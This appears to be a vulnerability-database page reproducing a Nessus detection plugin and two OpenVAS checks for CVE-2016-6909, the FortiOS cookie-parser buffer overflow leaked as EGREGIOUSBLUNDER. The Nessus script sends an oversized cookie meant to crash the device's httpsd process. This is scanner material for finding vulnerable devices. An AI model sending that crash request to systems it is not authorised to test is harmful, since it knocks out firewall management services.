Search...

Fortinet FortiOS Web Interface Cookie Parser RCE (EGREGIOUSBLUNDER)

2016-08-29T00:00:00

ID FORTIOS_COOKIE_PARSING_BOF.NASL
Type nessus
Reporter This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.
Modified 2021-02-02T00:00:00

Description

The Fortinet FortiOS management console running on the remote host is affected by a remote code execution vulnerability, known as EGREGIOUSBLUNDER, in its web interface due to improper validation when parsing cookies. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to cause a buffer overflow condition, resulting in a denial of service condition or the execution of arbitrary code.

EGREGIOUSBLUNDER is one of multiple Equation Group vulnerabilities and exploits disclosed on 2016/08/14 by a group known as the Shadow Brokers.

Note that this plugin attempts to kill the httpsd process, which appears to restart after termination. Additionally, this plugin requires report paranoia as it relies on a missing server response to indicate a vulnerable status, which may or may not be reliable.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(93196);
  script_version("1.7");
  script_cvs_date("Date: 2018/11/15 20:50:17");

  script_cve_id("CVE-2016-6909");
  script_bugtraq_id(92523);
  script_xref(name:"EDB-ID", value:"40276");

  script_name(english:"Fortinet FortiOS Web Interface Cookie Parser RCE (EGREGIOUSBLUNDER)");
  script_summary(english:"Tries to terminate the remote httpsd.");

  script_set_attribute(attribute:"synopsis", value:
"A web-based management console running on the remote host is affected
by a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Fortinet FortiOS management console running on the remote host
is affected by a remote code execution vulnerability, known as
EGREGIOUSBLUNDER, in its web interface due to improper validation when
parsing cookies. An unauthenticated, remote attacker can exploit this,
via a specially crafted HTTP request, to cause a buffer overflow
condition, resulting in a denial of service condition or the execution
of arbitrary code.

EGREGIOUSBLUNDER is one of multiple Equation Group vulnerabilities and
exploits disclosed on 2016/08/14 by a group known as the Shadow
Brokers.

Note that this plugin attempts to kill the httpsd process, which
appears to restart after termination. Additionally, this plugin
requires report paranoia as it relies on a missing server response to
indicate a vulnerable status, which may or may not be reliable.");
  script_set_attribute(attribute:"see_also", value:"https://fortiguard.com/psirt/FG-IR-16-023");
  # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?4c7e0cf3");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Fortinet FortiOS 4.1.11 / 4.2.13 / 4.3.9 / 5.0 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:X");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/08/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/08/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/08/29");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:fortinet:fortios");
  script_set_attribute(attribute:"in_the_news", value:"true");
  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.");

  script_dependencies("fortigate_detect.nasl");
  script_require_keys("www/fortios_ui", "Settings/ParanoidReport");
  script_require_ports("Services/www", 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");

# Use lack of response to flag vulnerability is not so reliable
if (report_paranoia &lt; 2) audit(AUDIT_PARANOID);

# FortiOS web gui not detected
get_kb_item_or_exit("www/fortios_ui");

port = get_http_port(default:443, embedded: TRUE);

# Do https only
if(get_port_transport(port) == ENCAPS_IP)
  exit(0, "Not testing non-https port " + port + ".");

app_name = "FortiOS Web Interface";
install = get_install_from_kb(appname:'fortios_ui', port:port, exit_on_fail:TRUE);
dir = install['dir'];
report_url = build_url(port:port, qs:dir);


#
# Request 1: Get the cookie name to use 
#
res = http_send_recv3(
  method:'GET',
  item:'/login',
  port:port,
  exit_on_fail:TRUE
  );

matches = eregmatch(string: res[1], pattern:"(APSCOOKIE.*?)=");
if(matches)
{
  cookie_name = matches[1];
}
else
{
  exit(1, "Failed to get APSCOOKIE name.");
}

url = "/index";

#
# Request 2: Test with a cookie having a valid length
#
cookie_good = cookie_name + 
'=Era=0&Payload=' +
crap(data:'A', length: 0x1000);

res = http_send_recv3(
  method:'POST',
  item:url,
  port:port,
  add_headers: make_array("Cookie", cookie_good),
  exit_on_fail: TRUE 
  );

#
# Request 3: Attempt to kill httpsd
#
cookie_bad = cookie_name + 
'=Era=0&Payload=' +
crap(data:'A', length: 0x1100); 

res = http_send_recv3(
  method:'POST',
  item:url,
  port:port,
  add_headers: make_array("Cookie", cookie_bad)
  );

req = http_last_sent_request();

if(res[2])
{
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, report_url);
}
else
{
  security_report_v4(port:    port, 
                    severity: SECURITY_HOLE, 
                    generic:  TRUE,
                    request:  make_list(req)
                    );
}

JSON Vulners Source

Initial Source

{"id": "FORTIOS_COOKIE_PARSING_BOF.NASL", "bulletinFamily": "scanner", "title": "Fortinet FortiOS Web Interface Cookie Parser RCE (EGREGIOUSBLUNDER)", "description": "The Fortinet FortiOS management console running on the remote host\nis affected by a remote code execution vulnerability, known as\nEGREGIOUSBLUNDER, in its web interface due to improper validation when\nparsing cookies. An unauthenticated, remote attacker can exploit this,\nvia a specially crafted HTTP request, to cause a buffer overflow\ncondition, resulting in a denial of service condition or the execution\nof arbitrary code.\n\nEGREGIOUSBLUNDER is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2016/08/14 by a group known as the Shadow\nBrokers.\n\nNote that this plugin attempts to kill the httpsd process, which\nappears to restart after termination. Additionally, this plugin\nrequires report paranoia as it relies on a missing server response to\nindicate a vulnerable status, which may or may not be reliable.", "published": "2016-08-29T00:00:00", "modified": "2021-02-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/93196", "reporter": "This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.", "references": ["http://www.nessus.org/u?4c7e0cf3", "https://fortiguard.com/psirt/FG-IR-16-023"], "cvelist": ["CVE-2016-6909"], "type": "nessus", "lastseen": "2021-02-01T02:44:43", "edition": 27, "viewCount": 1665, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-6909"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105875", "OPENVAS:1361412562310105886"]}, {"type": "zdt", "idList": ["1337DAY-ID-25265"]}, {"type": "nessus", "idList": ["FORTIOS_FG-IR-16-023.NASL"]}], "modified": "2021-02-01T02:44:43", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-02-01T02:44:43", "rev": 2}, "vulnersScore": 7.7}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93196);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:17\");\n\n script_cve_id(\"CVE-2016-6909\");\n script_bugtraq_id(92523);\n script_xref(name:\"EDB-ID\", value:\"40276\");\n\n script_name(english:\"Fortinet FortiOS Web Interface Cookie Parser RCE (EGREGIOUSBLUNDER)\");\n script_summary(english:\"Tries to terminate the remote httpsd.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web-based management console running on the remote host is affected\nby a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Fortinet FortiOS management console running on the remote host\nis affected by a remote code execution vulnerability, known as\nEGREGIOUSBLUNDER, in its web interface due to improper validation when\nparsing cookies. An unauthenticated, remote attacker can exploit this,\nvia a specially crafted HTTP request, to cause a buffer overflow\ncondition, resulting in a denial of service condition or the execution\nof arbitrary code.\n\nEGREGIOUSBLUNDER is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2016/08/14 by a group known as the Shadow\nBrokers.\n\nNote that this plugin attempts to kill the httpsd process, which\nappears to restart after termination. Additionally, this plugin\nrequires report paranoia as it relies on a missing server response to\nindicate a vulnerable status, which may or may not be reliable.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://fortiguard.com/psirt/FG-IR-16-023\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Fortinet FortiOS 4.1.11 / 4.2.13 / 4.3.9 / 5.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fortinet:fortios\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"fortigate_detect.nasl\");\n script_require_keys(\"www/fortios_ui\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\n# Use lack of response to flag vulnerability is not so reliable\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# FortiOS web gui not detected\nget_kb_item_or_exit(\"www/fortios_ui\");\n\nport = get_http_port(default:443, embedded: TRUE);\n\n# Do https only\nif(get_port_transport(port) == ENCAPS_IP)\n exit(0, \"Not testing non-https port \" + port + \".\");\n\napp_name = \"FortiOS Web Interface\";\ninstall = get_install_from_kb(appname:'fortios_ui', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nreport_url = build_url(port:port, qs:dir);\n\n\n#\n# Request 1: Get the cookie name to use \n#\nres = http_send_recv3(\n method:'GET',\n item:'/login',\n port:port,\n exit_on_fail:TRUE\n );\n\nmatches = eregmatch(string: res[1], pattern:\"(APSCOOKIE.*?)=\");\nif(matches)\n{\n cookie_name = matches[1];\n}\nelse\n{\n exit(1, \"Failed to get APSCOOKIE name.\");\n}\n\nurl = \"/index\";\n\n#\n# Request 2: Test with a cookie having a valid length\n#\ncookie_good = cookie_name + \n'=Era=0&Payload=' +\ncrap(data:'A', length: 0x1000);\n\nres = http_send_recv3(\n method:'POST',\n item:url,\n port:port,\n add_headers: make_array(\"Cookie\", cookie_good),\n exit_on_fail: TRUE \n );\n\n#\n# Request 3: Attempt to kill httpsd\n#\ncookie_bad = cookie_name + \n'=Era=0&Payload=' +\ncrap(data:'A', length: 0x1100); \n\nres = http_send_recv3(\n method:'POST',\n item:url,\n port:port,\n add_headers: make_array(\"Cookie\", cookie_bad)\n );\n\nreq = http_last_sent_request();\n\nif(res[2])\n{\n audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, report_url);\n}\nelse\n{\n security_report_v4(port: port, \n severity: SECURITY_HOLE, \n generic: TRUE,\n request: make_list(req)\n );\n}\n", "naslFamily": "CGI abuses", "pluginID": "93196", "cpe": ["cpe:/o:fortinet:fortios"], "scheme": null, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}

{"cve": [{"lastseen": "2021-02-02T06:28:10", "description": "Buffer overflow in the Cookie parser in Fortinet FortiOS 4.x before 4.1.11, 4.2.x before 4.2.13, and 4.3.x before 4.3.9 and FortiSwitch before 3.4.3 allows remote attackers to execute arbitrary code via a crafted HTTP request, aka EGREGIOUSBLUNDER.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-08-24T16:30:00", "title": "CVE-2016-6909", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6909"], "modified": "2019-05-22T15:06:00", "cpe": ["cpe:/o:fortinet:fortiswitch:3.4.2"], "id": "CVE-2016-6909", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6909", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:fortinet:fortiswitch:3.4.2:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:35:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6909"], "description": "FortiGate firmware (FOS) released before Aug 2012 has a cookie parser buffer overflow vulnerability.", "modified": "2018-10-25T00:00:00", "published": "2016-08-18T00:00:00", "id": "OPENVAS:1361412562310105875", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105875", "type": "openvas", "title": "FortiOS: Cookie Parser Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fortigate_FG-IR-16-023.nasl 12096 2018-10-25 12:26:02Z asteins $\n#\n# FortiOS: Cookie Parser Buffer Overflow Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:fortinet:fortigate\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105875\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12096 $\");\n script_cve_id(\"CVE-2016-6909\");\n\n script_name(\"FortiOS: Cookie Parser Buffer Overflow Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://fortiguard.com/psirt/FG-IR-16-023\");\n\n script_tag(name:\"impact\", value:\"This vulnerability, when exploited by a crafted HTTP request, can result in execution control being taken over.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Upgrade to release 5.x.\nUpgrade to release 4.3.9 or above for models not compatible with FortiOS 5.x.\");\n\n script_tag(name:\"summary\", value:\"FortiGate firmware (FOS) released before Aug 2012 has a cookie parser buffer overflow vulnerability.\");\n\n script_tag(name:\"affected\", value:\"FortiGate (FOS):\n\n4.3.8 and below\n\n4.2.12 and below\n\n4.1.10 and below\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 14:26:02 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-18 11:05:04 +0200 (Thu, 18 Aug 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"FortiOS Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_fortigate_version.nasl\");\n script_mandatory_keys(\"fortigate/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) ) exit( 0 );\n\nif( version =~ \"^4\\.1\\.\" ) fix = '4.1.11';\nif( version =~ \"^4\\.2\\.\" ) fix = '4.2.13';\nif( version =~ \"^4\\.3\\.\" ) fix = '4.3.9';\n\nif( ! fix ) exit( 99 );\n\nif( version_is_less( version:version, test_version:fix ) )\n{\n report = report_fixed_ver( installed_version:version, fixed_version:fix );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T17:21:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6909"], "description": "FortiGate firmware (FOS) released before Aug 2012 has a cookie parser buffer overflow vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2016-09-06T00:00:00", "id": "OPENVAS:1361412562310105886", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105886", "type": "openvas", "title": "FortiOS: Cookie Parser Buffer Overflow Vulnerability (remote check)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# FortiOS: Cookie Parser Buffer Overflow Vulnerability (remote check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105886\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2016-6909\");\n script_name(\"FortiOS: Cookie Parser Buffer Overflow Vulnerability (remote check)\");\n\n script_xref(name:\"URL\", value:\"https://fortiguard.com/psirt/FG-IR-16-023\");\n\n script_tag(name:\"impact\", value:\"This vulnerability, when exploited by a crafted HTTP request, can result in execution control being taken over.\");\n\n script_tag(name:\"vuldetect\", value:\"Check the Etag\");\n\n script_tag(name:\"solution\", value:\"Upgrade to release 5.x.\nUpgrade to release 4.3.9 or above for models not compatible with FortiOS 5.x.\");\n\n script_tag(name:\"summary\", value:\"FortiGate firmware (FOS) released before Aug 2012 has a cookie parser buffer overflow vulnerability.\");\n\n script_tag(name:\"affected\", value:\"FortiGate (FOS):\n\n4.3.8 and below\n\n4.2.12 and below\n\n4.1.10 and below\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-09-06 11:28:49 +0200 (Tue, 06 Sep 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_mandatory_keys(\"ETag/banner\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\ninclude(\"misc_func.inc\");\n\nport = http_get_port( default:443 );\n\nbanner = http_get_remote_headers( port:port );\nif( ! banner || \"ETag\" >!< banner ) exit( 0 );\n\netag = eregmatch( pattern:'ETag: \"([^\"]+)\"', string:banner );\nif( isnull(etag[1] ) ) exit( 0 );\n\netag = split( etag[1], sep:\"-\", keep:FALSE );\nif( ( max_index( etag ) < 3 ) ) exit( 0 );\n\net = etag[2];\nif( strlen( et ) != 8 ) exit( 0 );\n\netags = make_list( \"44443fd4\",\"44c526c5\",\"45a3ea60\",\"45baacf4\",\"45f0af67\",\"47e0669f\",\"468abbad\",\"46c6166d\",\n \"46df457c\",\"4602cf97\",\"463b99a6\",\"468cad93\",\"46d9607c\",\"47b355de\",\"489129e7\",\"443ede0d\",\n \"44c52c4f\",\"452184d7\",\"45a3f01e\",\"45bab263\",\"45f0b580\",\"4602cfe5\",\"463b9965\",\"468cbb86\",\n \"46d9672a\",\"471d2e73\",\"47b355da\",\"47e06d95\",\"48912069\",\"468ac1d0\",\"46a7ad09\",\"46c61f79\",\n \"46df4da9\",\"4717beff\",\"474b9480\",\"47bcda2f\",\"48b30fac\",\"490bb64e\",\"47a3f4ee\",\"47df4682\",\n \"482b72f5\",\"488fa68e\",\"49064b4d\",\"49ae1d20\",\"487e7a57\",\"48d43154\",\"49273663\",\"49ade40f\",\n \"49c45c70\",\"49dd033a\",\"4a4a955b\",\"4ace863a\",\"4b3185d6\",\"4b7c8347\",\"4cc1d9e0\",\"4a384886\",\n \"4b0f40be\",\"4a8de859\",\"4ade3518\",\"4b318abd\",\"4b58d924\",\"4ba3e7e6\",\"4c22a3f3\",\"4c2a8446\",\n \"4c88306f\",\"4ca38e08\",\"4d435410\",\"4dfaabba\",\"ff80c272\",\"ff80c279\",\"4c74581f\",\"4d083087\",\n \"4d6d53b0\",\"4d93bdf9\",\"4dae0eb8\",\"4dd6af49\",\"4e2496ed\",\"4d84169e\",\"4e090fe3\",\"44443ed6\",\n \"44c52afa\",\"4522b784\",\"45500063\",\"45a3f02e\",\"45bab272\",\"45f0ba4d\",\"460d7a1f\",\"463aa4d2\",\n \"46806d0b\",\"46cb9bfc\",\"47e06dbe\",\"48913626\",\"45948af9\",\"45a6f4c1\",\"45ba73c7\",\"45f1c561\",\n \"460d88a0\",\"468ac251\",\"468321e2\",\"46c61fcf\",\"46df4e86\",\"4717c14d\",\"474b9d17\",\"47bcdc5c\",\n \"48b312ee\",\"490bb6a0\",\"47a3f5a7\",\"47df4721\",\"482b7090\",\"488faa33\",\"49064b4b\",\"49ae254b\",\n \"49ffa204\",\"487e7ecc\",\"48d43248\",\"492737d4\",\"49adeaae\",\"49c45cd3\",\"49dd05b9\",\"4a4aec23\",\n \"4acfd94e\",\"4b328455\",\"4b7c709c\",\"4cc85189\",\"499f3750\",\"49db8b32\",\"4a37e55a\",\"4b16d0ce\",\n \"4a8de79b\",\"4ade32fe\",\"4b318bb4\",\"4b58d9e4\",\"4ba3e887\",\"4c22a8f5\",\"4c2a8e5f\",\"4c882f51\",\n \"4ca39510\",\"4d4359e1\",\"4dfab1c1\",\"ff2a0272\",\"ff2a0279\",\"4c746630\",\"4d083771\",\"4d6d57f7\",\n \"4d93c93e\",\"4dae1c33\",\"4dd6be44\",\"4e24a35c\",\"4d8404a9\",\"4e08fc94\",\"443ed96e\",\"44c52523\",\n \"4522a9b7\",\"454ff829\",\"45a3eee4\",\"45baafe1\",\"45f0b528\",\"460d78e2\",\"463a9d82\",\"468066d7\",\n \"46cb9803\",\"47e06db5\",\"48913369\",\"45948486\",\"45a6ed51\",\"45ba6c80\",\"45f1bee7\",\"460d84ba\",\n \"468ac195\",\"46831ae7\",\"46c61d81\",\"46df4be9\",\"4717b955\",\"474b9368\",\"47bce039\",\"48b309de\",\n \"490bb553\",\"47a3eb7d\",\"47df39f8\",\"482b665b\",\"488f9d9e\",\"49063f0f\",\"49ae0f61\",\"49ff87ee\",\n \"487e6e64\",\"48d42a0e\",\"49272ac0\",\"49adcf83\",\"49c4428a\",\"49dcea97\",\"4a4ac8a2\",\"4acfb690\",\n \"4b329ac9\",\"4b7c0774\",\"4cc85360\",\"499f36b3\",\"49db8a40\",\"4a37e407\",\"4b16ce6b\",\"4a8de5fb\",\n \"4ade33db\",\"4b318b1d\",\"4b58d915\",\"4ba3e740\",\"4c22a3f3\",\"4c2a87f3\",\"4c88270e\",\"4ca3911b\",\n \"4d4348f3\",\"4dfaabc1\",\"ff3a0272\",\"ff3a0279\",\"4c745c40\",\"4d082d04\",\"4d6d537d\",\"4d93ba56\",\n \"4dae0ccf\",\"4dd6af6d\",\"4e2496d3\",\"4d83fb16\",\"4e08f34e\",\"45218416\",\"454ffff6\",\"45a3f2a2\",\n \"45bab65e\",\"45f0bb96\",\"482b785e\",\"490651ca\",\"487e7fcd\",\"48d438a9\",\"49273e0c\",\"49adecc7\",\n \"49c471d3\",\"49dd07b8\",\"4a4aeee3\",\"499f381f\",\"49db8b9d\",\"4a37e5ed\",\"4b16d150\",\"4a8de874\",\n \"4ade3634\",\"4b318c6f\",\"4b58da4a\",\"4ba3ea3a\",\"4c22abac\",\"4c2a8b64\",\"4c88304b\",\"4ca394e0\",\n \"4d435b90\",\"4dfab44e\",\"ff4a0272\",\"ff4a0279\",\"4c746382\",\"4d083d66\",\"4d6d6086\",\"4d93cef4\",\n \"4dae1d25\",\"4dd6bce0\",\"4e24a478\",\"4fd0169d\",\"4d840fc3\",\"4e08fe48\",\"48d434a1\",\"499f37d5\",\n \"49db8c53\",\"4a37e619\",\"4b16d14f\",\"4a8de872\",\"4ade35c8\",\"4b318c8f\",\"4b58d602\",\"4ba3ea39\",\n \"ff5a0272\",\"48ebf4e5\",\"49a726b1\",\"49c2f6eb\",\"49d50ba6\",\"4a4972e5\",\"4acf7bf4\",\"4b317cd0\",\n \"4b7c83e9\",\"4cc07c21\",\"499f3876\",\"49db8a8c\",\"4a37e799\",\"4b16ce32\",\"4a8de5dd\",\"4ade354e\",\n \"4b31890b\",\"4b58d766\",\"4ba3e517\",\"4c22a1af\",\"4c2a8997\",\"4c882a6e\",\"4ca38e77\",\"4d434d71\",\n \"4dfaaa8e\",\"ff6b0272\",\"ff6b0279\",\"4c745805\",\"4d0830cf\",\"4d6d4f28\",\"4d93c137\",\"4dae0619\",\n \"4dd6af65\",\"4e2494a1\",\"4d8402ca\",\"4e090c3c\",\"443ed9bc\",\"44c524a6\",\"45217d85\",\"45a3e9c5\",\n \"45baac66\",\"45f0aeca\",\"460d732c\",\"463a98c5\",\"46806671\",\"46cb95bb\",\"47e0676b\",\"48912cc2\",\n \"459484d8\",\"45a6eda3\",\"45ba6ce1\",\"45f1bf6b\",\"460d8176\",\"468abbd8\",\"4683142d\",\"46c618cd\",\n \"46df475e\",\"4717baf9\",\"474b9010\",\"47bcd6f0\",\"48b30c5e\",\"490bb4a5\",\"47a3e919\",\"47df3b36\",\n \"482b67a1\",\"488f9d2b\",\"49063c22\",\"49ae068e\",\"49ff8382\",\"487e6b1d\",\"48d4212c\",\"4927278f\",\n \"49adc356\",\"49c43b4e\",\"49dcde89\",\"4a4ac12f\",\"4acfae3e\",\"4b32925e\",\"4b7bff1f\",\"4cc8529a\",\n \"499f3690\",\"49db8a5a\",\"4a37e3fe\",\"4b16ce96\",\"4a8de623\",\"4ade32d7\",\"4b318927\",\"4b58d762\",\n \"4ba3e573\",\"4c229fca\",\"4c2a82c9\",\"4c882661\",\"4ca391ed\",\"4d434fb7\",\"4dfaabbb\",\"ff800272\",\n \"ff800279\",\"4c74569a\",\"4d082af0\",\"4d6d5188\",\"4d93ba54\",\"4dae0da0\",\"4dd6af1e\",\"4e2496ea\",\n \"4d84181e\",\"4e090fbe\",\"45a6edd5\",\"82ffffff\",\"83ffffff\",\"45217ec9\",\"49064d61\",\"46d96863\",\n \"49d11af3\",\"46cb9c1e\",\"4acff334\" );\n\nif( in_array( search:et, array:etags ) )\n{\n report = 'The Etag \"' + et + '\" of the remote Forti device was found in the \"EGBL.config\" and therefore the device is affected by a security bypass.';\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 0 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": 